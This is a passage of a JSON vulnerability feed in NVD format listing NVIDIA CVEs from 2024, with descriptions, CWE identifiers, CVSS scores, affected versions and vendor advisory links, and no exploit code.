"tags" : [ ] }, { "url" : "https://www.talosintelligence.com/vulnerability_reports/TALOS-2024-2013", "name" : "https://www.talosintelligence.com/vulnerability_reports/TALOS-2024-2013", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "NVIDIA GPU Display Driver for Windows contains a vulnerability in the user mode layer, where an unprivileged regular user can cause an out-of-bounds read. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-10-26T08:15Z", "lastModifiedDate" : "2024-11-21T08:45Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0119", "ASSIGNER" : "psirt@nvidia.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5586", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5586", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.talosintelligence.com/vulnerability_reports/TALOS-2024-2015", "name" : "https://www.talosintelligence.com/vulnerability_reports/TALOS-2024-2015", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "NVIDIA GPU Display Driver for Windows contains a vulnerability in the user mode layer, where an unprivileged regular user can cause an out-of-bounds read. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-10-26T08:15Z", "lastModifiedDate" : "2024-11-21T08:45Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0120", "ASSIGNER" : "psirt@nvidia.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5586", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5586", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.talosintelligence.com/vulnerability_reports/TALOS-2024-2014", "name" : "https://www.talosintelligence.com/vulnerability_reports/TALOS-2024-2014", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "NVIDIA GPU Display Driver for Windows contains a vulnerability in the user mode layer, where an unprivileged regular user can cause an out-of-bounds read. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-10-26T08:15Z", "lastModifiedDate" : "2024-11-21T08:45Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0121", "ASSIGNER" : "psirt@nvidia.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5586", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5586", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.talosintelligence.com/vulnerability_reports/TALOS-2024-1955", "name" : "https://www.talosintelligence.com/vulnerability_reports/TALOS-2024-1955", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "NVIDIA GPU Display Driver for Windows contains a vulnerability in the user mode layer, where an unprivileged regular user can cause an out-of-bounds read. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-10-26T08:15Z", "lastModifiedDate" : "2024-11-21T08:45Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0122", "ASSIGNER" : "psirt@nvidia.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-862" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5570", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5570", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "NVIDIA Delegated Licensing Service for all appliance platforms contains a vulnerability where an attacker may cause an unauthorized action. A successful exploit of this vulnerability may lead to partial denial of service and confidential information disclosure." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-11-23T00:15Z", "lastModifiedDate" : "2024-11-23T00:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0123", "ASSIGNER" : "psirt@nvidia.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-1285" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5577", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5577", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "NVIDIA CUDA toolkit for Windows and Linux contains a vulnerability in the nvdisasm command line tool where an attacker may cause an improper validation in input issue by tricking the user into running nvdisasm on a malicious ELF file. A successful exploit of this vulnerability may lead to denial of service." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-10-03T17:15Z", "lastModifiedDate" : "2024-10-04T13:50Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0124", "ASSIGNER" : "psirt@nvidia.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-416" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5577", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5577", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "NVIDIA CUDA Toolkit for Windows and Linux contains a vulnerability in the nvdisam command line tool, where a user can cause nvdisasm to read freed memory by running it on a malformed ELF file. A successful exploit of this vulnerability might lead to a limited denial of service." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-10-03T17:15Z", "lastModifiedDate" : "2024-10-04T13:50Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0125", "ASSIGNER" : "psirt@nvidia.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-476" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5577", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5577", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "NVIDIA CUDA Toolkit for Windows and Linux contains a vulnerability in the nvdisam command line tool, where a user can cause a NULL pointer dereference by running nvdisasm on a malformed ELF file. A successful exploit of this vulnerability might lead to a limited denial of service." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-10-03T17:15Z", "lastModifiedDate" : "2024-10-04T13:50Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0126", "ASSIGNER" : "psirt@nvidia.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5586", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5586", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability which could allow a privileged attacker to escalate permissions. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-10-26T08:15Z", "lastModifiedDate" : "2024-10-28T13:58Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0127", "ASSIGNER" : "psirt@nvidia.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5586", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5586", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "NVIDIA vGPU software contains a vulnerability in the GPU kernel driver of the vGPU Manager for all supported hypervisors, where a user of the guest OS can cause an improper input validation by compromising the guest OS kernel. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, data tampering, denial of service, and information disclosure." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-10-26T09:15Z", "lastModifiedDate" : "2024-10-28T13:58Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0128", "ASSIGNER" : "psirt@nvidia.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5586", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5586", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "NVIDIA vGPU software contains a vulnerability in the Virtual GPU Manager that allows a user of the guest OS to access global resources. A successful exploit of this vulnerability might lead to information disclosure, data tampering, and escalation of privileges." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-10-26T09:15Z", "lastModifiedDate" : "2024-10-28T13:58Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0129", "ASSIGNER" : "psirt@nvidia.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-22" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5580", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5580", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "NVIDIA NeMo contains a vulnerability in SaveRestoreConnector where a user may cause a path traversal issue via an unsafe .tar file extraction. A successful exploit of this vulnerability may lead to code execution and data tampering." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:nemo:*:*:*:*:*:*:*:*", "versionEndIncluding" : "r2.0.0rc0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-15T06:15Z", "lastModifiedDate" : "2024-11-08T15:33Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0130", "ASSIGNER" : "psirt@nvidia.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-287" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5584", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5584", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "NVIDIA UFM Enterprise, UFM Appliance, and UFM CyberAI contain a vulnerability where an attacker can cause an improper authentication issue by sending a malformed request through the Ethernet management interface. A successful exploit of this vulnerability might lead to escalation of privileges, data tampering, denial of service, and information disclosure." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-12-06T20:15Z", "lastModifiedDate" : "2024-12-06T20:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0131", "ASSIGNER" : "psirt@nvidia.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-805" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5614", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5614", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "NVIDIA GPU kernel driver for Windows and Linux contains a vulnerability where a potential user-mode attacker could read  a buffer with an incorrect length. A successful exploit of this vulnerability might lead to denial of service." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2025-02-02T01:15Z", "lastModifiedDate" : "2025-02-02T01:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0132", "ASSIGNER" : "psirt@nvidia.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-367" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5582", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5582", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "NVIDIA Container Toolkit 1.16.1 or earlier contains a Time-of-check Time-of-Use (TOCTOU) vulnerability when used with default configuration where a specifically crafted container image may gain access to the host file system. This does not impact use cases where CDI is used. A successful exploit of this vulnerability may lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:nvidia_container_toolkit:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.16.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:nvidia_gpu_operator:*:*:*:*:*:*:*:*", "versionEndExcluding" : "24.6.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "HIGH", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.3, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.6, "impactScore" : 6.0 } }, "publishedDate" : "2024-09-26T06:15Z", "lastModifiedDate" : "2024-10-02T14:45Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0133", "ASSIGNER" : "psirt@nvidia.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-367" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5582", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5582", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "NVIDIA Container Toolkit 1.16.1 or earlier contains a vulnerability in the default mode of operation allowing a specially crafted container image to create empty files on the host file system. This does not impact use cases where CDI is used. A successful exploit of this vulnerability may lead to data tampering." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:nvidia_container_toolkit:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.16.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:nvidia_gpu_operator:*:*:*:*:*:*:*:*", "versionEndExcluding" : "24.6.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:N/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "HIGH", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 3.4, "baseSeverity" : "LOW" }, "exploitabilityScore" : 1.6, "impactScore" : 1.4 } }, "publishedDate" : "2024-09-26T06:15Z", "lastModifiedDate" : "2024-10-02T14:43Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0134", "ASSIGNER" : "psirt@nvidia.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-Other" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5585", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5585", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "NVIDIA Container Toolkit and NVIDIA GPU Operator for Linux contain a UNIX vulnerability where a specially crafted container image can lead to the creation of unauthorized files on the host. The name and location of the files cannot be controlled by an attacker. A successful exploit of this vulnerability might lead to data tampering." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:nvidia_container_toolkit:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.17", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:nvidia_gpu_operator:*:*:*:*:*:*:*:*", "versionEndExcluding" : "24.9.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 4.1, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 1.4 } }, "publishedDate" : "2024-11-05T19:15Z", "lastModifiedDate" : "2024-11-08T15:53Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0135", "ASSIGNER" : "psirt@nvidia.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-653" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5599", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5599", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "NVIDIA Container Toolkit contains an improper isolation vulnerability where a specially crafted container image could lead to modification of a host binary. A successful exploit of this vulnerability may lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2025-01-28T03:15Z", "lastModifiedDate" : "2025-01-28T03:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0136", "ASSIGNER" : "psirt@nvidia.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-653" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5599", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5599", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "NVIDIA Container Toolkit contains an improper isolation vulnerability where a specially crafted container image could lead to untrusted code obtaining read and write access to host devices. This vulnerability is present only when the NVIDIA Container Toolkit is configured in a nondefault way. A successful exploit of this vulnerability may lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2025-01-28T03:15Z", "lastModifiedDate" : "2025-01-28T03:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0137", "ASSIGNER" : "psirt@nvidia.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-653" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5599", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5599", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "NVIDIA Container Toolkit contains an improper isolation vulnerability where a specially crafted container image could lead to untrusted code running in the host’s network namespace. This vulnerability is present only when the NVIDIA Container Toolkit is configured in a nondefault way. A successful exploit of this vulnerability may lead to denial of service and escalation of privileges." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2025-01-28T03:15Z", "lastModifiedDate" : "2025-01-28T03:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0138", "ASSIGNER" : "psirt@nvidia.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5595", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5595", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "NVIDIA Base Command Manager contains a missing authentication vulnerability in the CMDaemon component. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-11-23T00:15Z", "lastModifiedDate" : "2024-11-23T00:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0139", "ASSIGNER" : "psirt@nvidia.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5600", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5600", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "NVIDIA Base Command Manager and Bright Cluster Manager for Linux contain an insecure temporary file vulnerability. A successful exploit of this vulnerability might lead to denial of service." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-12-06T20:15Z", "lastModifiedDate" : "2024-12-06T20:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0140", "ASSIGNER" : "psirt@nvidia.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-502" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5597", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5597", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "NVIDIA RAPIDS contains a vulnerability in cuDF and cuML, where a user could cause a deserialization of untrusted data issue. A successful exploit of this vulnerability might lead to code execution, data tampering, denial of service, and information disclosure." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2025-01-28T04:15Z", "lastModifiedDate" : "2025-01-28T04:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0141", "ASSIGNER" : "psirt@nvidia.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-782" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5561", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5561", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "NVIDIA Hopper HGX for 8-GPU contains a vulnerability in the GPU vBIOS that may allow a malicious actor with tenant level GPU access to write to an unsupported registry causing a bad state. A successful exploit of this vulnerability may lead to denial of service." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2025-03-05T02:15Z", "lastModifiedDate" : "2025-03-05T02:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0142", "ASSIGNER" : "psirt@nvidia.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5596", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5596", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.talosintelligence.com/vulnerability_reports/TALOS-2024-2080", "name" : "https://www.talosintelligence.com/vulnerability_reports/TALOS-2024-2080", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "NVIDIA nvJPEG2000 library contains a vulnerability where an attacker can cause an out-of-bounds write issue by means of a specially crafted JPEG2000 file. A successful exploit of this vulnerability might lead to code execution and data tampering." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2025-02-12T00:15Z", "lastModifiedDate" : "2025-02-12T01:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0143", "ASSIGNER" : "psirt@nvidia.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : 